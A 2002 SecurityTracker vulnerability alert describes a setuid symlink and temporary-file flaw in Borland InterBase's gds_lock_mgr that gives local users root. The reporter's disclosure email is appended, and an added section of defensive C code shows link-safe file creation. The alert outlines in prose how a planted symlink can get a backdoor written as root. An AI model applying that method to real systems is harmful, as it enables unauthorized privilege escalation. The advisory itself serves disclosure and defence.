SecurityTracker.com
Category:  Application (Database)  >  InterBase
Vendors:  Borland
Borland InterBase 'gds_lock_mgr' Temporary File Security Hole Gives Local Users Root Access
SecurityTracker Alert ID:  1005289
CVE Reference:  GENERIC-MAP-NOMATCH
Date:  Sep 26 2002
Impact:  Execution of arbitrary code via local system, Root access via local system
Exploit Included:  Yes  
Version(s): 6.5
Description:  A vulnerability was reported in the Borland InterBase gds_lock_mgr database component. A local user can write arbitrary code to certain files with root privileges.

A local user can create a symbolic link, named after a specially named temporary file used by InterBase, that points to an arbitrary file (for example, a backdoor xinetd process). The local user can then execute gds_lock_mgr, which causes the file the symlink points to to be created with the privileges of gds_lock_mgr. Arbitrary code can then be written to that file and executed when the host is rebooted.

According to the report, 'gds_lock_mgr' is configured with set user id (setuid) root privileges.

The vendor has reportedly been notified.

[Editor's note: As noted in this report, the vulnerability described in this alert is different than the gds_lock_mgr buffer overflow that was reported in June 2002.]

Impact:  A local user can write to arbitrary files with root privileges to gain root access on the system.
Solution:  No solution was available at the time of this entry.
Vendor URL:  www.borland.com/interbase/
Cause:  Access control error, State error
Underlying OS:  Linux (Any), UNIX (Solaris - SunOS)
Reported By:  <grazer@digit-labs.org>
Message History:   None.
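
The flaw described above is a setuid program creating a predictably named temporary file and following a symbolic link that a local user planted under that name. The C code below is an added example, not Borland's code and not part of the original report, showing file creation that refuses a pre-existing link; `create_private_file`, the demo function and all paths are assumptions constructed for the demonstration.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Create `path` for writing without following a pre-planted link.
 * Returns an fd on success, -1 with errno set on refusal. */
int create_private_file(const char *path)
{
    /* O_EXCL fails with EEXIST if the name exists, symlinks included;
     * O_NOFOLLOW refuses a symlink in the final path component. */
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW | O_CLOEXEC,
                  0600); /* the umask can only remove bits from 0600 */
    if (fd < 0)
        return -1;
    struct stat st;
    /* Check the object that was opened, not the name it was opened by. */
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) ||
        st.st_nlink != 1 || st.st_uid != geteuid()) {
        close(fd);
        errno = EPERM;
        return -1;
    }
    return fd;
}

/* Constructed scenario: a symlink already sits under the predictable name
 * when the privileged program starts. Returns 1 if creation was refused
 * and the link target was never created, 0 otherwise, -1 on setup error. */
int demo_planted_symlink_refused(void)
{
    char dir[] = "/tmp/lockdemo.XXXXXX";
    char link_path[128], target[128];
    if (!mkdtemp(dir)) return -1;
    snprintf(link_path, sizeof link_path, "%s/app_init.lock", dir);
    snprintf(target, sizeof target, "%s/target.conf", dir);
    if (symlink(target, link_path) != 0) return -1;
    int fd = create_private_file(link_path);
    int refused = (fd < 0 && errno == EEXIST);
    if (fd >= 0) close(fd);
    int untouched = (access(target, F_OK) != 0);
    unlink(link_path); unlink(target); rmdir(dir);
    return refused && untouched;
}

int main(void) { return demo_planted_symlink_refused() == 1 ? 0 : 1; }
```

Keeping such files in a directory that only the service account can write to, rather than a world-writable one, removes the opportunity to plant the link in the first place.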


 Source Message Contents

Date:  Wed, 25 Sep 2002 12:05:32 -0700 (PDT)
From:  <grazer@digit-labs.org>
Subject:  Borland Interbase local root exploit

 


Hello,

I've found a bug in the Interbase gds_lock_mgr binary which is shipped
with all versions of the Sun Cobalt RAQ (XTR/4/550 etc.) and is suid by
default.

Borland did not respond to my emails. The exploit is attached.
Note: other bug than disclosed by snosoft some weeks ago.

Sincerely yours,

Wouter ter Maat aka grazer



 



Copyright 2002, SecurityGlobal.net LLC